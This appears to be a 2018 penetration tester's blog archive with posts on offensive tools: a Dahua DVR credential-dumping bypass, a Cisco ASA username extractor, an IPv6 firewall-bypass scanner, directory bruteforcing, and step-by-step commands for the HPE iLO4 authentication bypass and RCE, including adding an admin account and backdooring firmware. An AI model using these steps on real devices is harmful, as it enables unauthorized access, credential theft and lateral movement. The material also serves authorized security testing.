Author Archive

CVE-2013-6117 – Tool (Multithreaded and Extremely Fast)

July 23, 2018 Leave a comment

I wrote a simple script in Go to test if the target Dahua DVR device is vulnerable to authentication bypass flaw (CVE-2013-6117).

Dahua DVRs listen on TCP port 37777 by default.

If it is vulnerable, it will dump the credentials along with the dynamic dns name (DynDNS).

Some system administrators might use the same password for other systems. Therefore, a penetration tester might be able to use the credentials obtained from the DVR to gain further access into the network by accessing other systems or applications.

As the script is written in Go, it makes the tool extremely fast.

For more information regarding this vulnerability, you might want to check out

Screen Shot 2018-07-24 at 2.06.12 AM.png
The script can be downloaded from


CRESTCon Asia 2018 – Config Password Encryption Gone Wrong

July 21, 2018 Leave a comment

Below are my presentation slides from CRESTCon Asia 2018.

I presented the topic “Config Password Encryption Gone Wrong”.

I will be working on a proper writeup which contains more details. Please follow my blog to get updates.

Categories: Uncategorized

Wordlists for Dir/File Bruteforcing

July 21, 2018 Leave a comment

i have been updating a couple of wordlists under my pathBrute Github project that could be useful to a  penetration tester during the recon phrase to discover ‘interesting paths’ on target websites.

Do check out my Github page if you are interested to find out more. There are about more than 30,000 entries in the wordlists as of 21st July 2018.

The wordlists are extracted from Exploit Database, Packetstorm and Metasploit framework.

  1. Metasploit
  2. Exploit database
  3. Packetstorm

Below is a screenshot of one of the wordlists.
Screen Shot 2018-07-21 at 8.17.39 PM.png

Categories: Recon

Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

June 30, 2018 Leave a comment

The below contains some of my own notes for exploiting CVE-2017-12542.  The below notes are incomplete. I will spend some time on how to get RCE on other version of firmwares for HP iLO (as explained below).

List / Add users on the HP iLO
If you just need to list or add accounts on the HP iLO, you can just use the script from or Metasploit module (

$ git clone
$ cd CVE-2017-12542
$ python -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator


$ python /pentest/CVE-2017-12542/ -u newadmin -p newadmin x.x.x.x

RCE on the HP iLO
The RCE/Backdoor exploit at currently only works for the below firmwares. Some modifications might be required to work on other versions.

Based on HP’s advisory (, iLO 4 prior to versions 2.53 are vulnerable.

The firmware for HP iLO can be downloaded from

Steps on how to get command execution on HP iLO and extract passwords

$ git clone

$ curl -s -k  https://x.x.x.x/xmldata?item=all | grep -i “<FWRI>”

$ wget

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

cd ilo4_toolbox/scripts/iLO4/

$ ./ ilo4_253.bin

$ python x.x.x.x


Categories: Exploitation

Using IPv6 to Bypass Security (tool)

June 22, 2018 Leave a comment

John Anderson from Trustwave wrote an interesting post on Trustwave SpiderLabs blog (link at end of this post).

In the article, an attacker was able to use IPv6 to bypass security protections that was in place for iPv4 but not IPv6.

The number of open ports on the IPv6 and IPv4 addresses on the same host are different.

Below is a walkthrough of how to perform the technique.

1) Sends an ICMP echo request (ping6 ff02::1%eth0) to the broadcast address (ff02::1) , all IPv6 hosts in the local network will reply
2) Sends an ARP requests to all IPv4 hosts in the local network
3) Performs a port scan of all IPv4 and IPv6 hosts that are alive in the local network
4) Match the IPv6 address to the IPv4 address based on the MAC address information.
5) Checks to see if the scan against the IPv6 address on the host returns more open ports that the IPv4 address on the same host and outputs the difference in ports (if any)

I wrote a simple script to make the testing for this easier by automating these steps so that we can focus on more important testing.

Below is a screenshot of how the tool looks like when it runs.

In the screenshot below (in the last few lines), TCP ports 22, 111 and 8080 were accessible on the IPv6 interface of the host ( | fe80::250:56ff:fe97:7a3b) but not on the IPv4 interface.

The next step would be to fingerprint the services running on the IPv6 interface, test for default or weak accounts (SSH), look for vulnerabilities and so on. You might just get lucky.

You can find the tool in the below Github link


Below are some useful articles that are related—threats/weaponizing-ipv6-to-bypass-ipv4-security-/a/d-id/1331993

(CVE-2018-0296) Script to extract usernames from Cisco ASA devices

June 21, 2018 Leave a comment

I wrote a simple script to extract usernames from Cisco ASA devices if they are vulnerable to CVE-2018-0296.

You can check out this blog post for more technical details.

Screen Shot 2018-06-21 at 5.04.44 PM

This script would be useful instead of doing it manually.

However, there are easier ways to get usernames belonging to an organization.

The script is available at

Categories: Uncategorized

pathBrute – yet another dirbuster alternative

April 21, 2018 Leave a comment

pathBrute is yet another dirbuster alternative.

It’s written in Go so it’s blazing fast.

pathBrute contains/uses a number of self compiled wordlists for identifying “interesting” content and potentially vulnerable websites.
1) 13925 URI paths from Exploit-Database (increasing regularly)
2) URI paths from Metasploit Framework

pathBrute can also use wordlists from other sources if you prefer.

pathBrute can also be used for identifying if any type of CMS (Joomla, WordPress and Drupal) is running on the target websites and fingerprint the versions of the CMS using the –cms option.

Binaries for different platforms and architectures are available in the the below Github project’s release section.

pathBrute is also available as a docket container.

I hope this tool will come in handy to you as it is to me.

The tool can be downloaded from

Categories: Uncategorized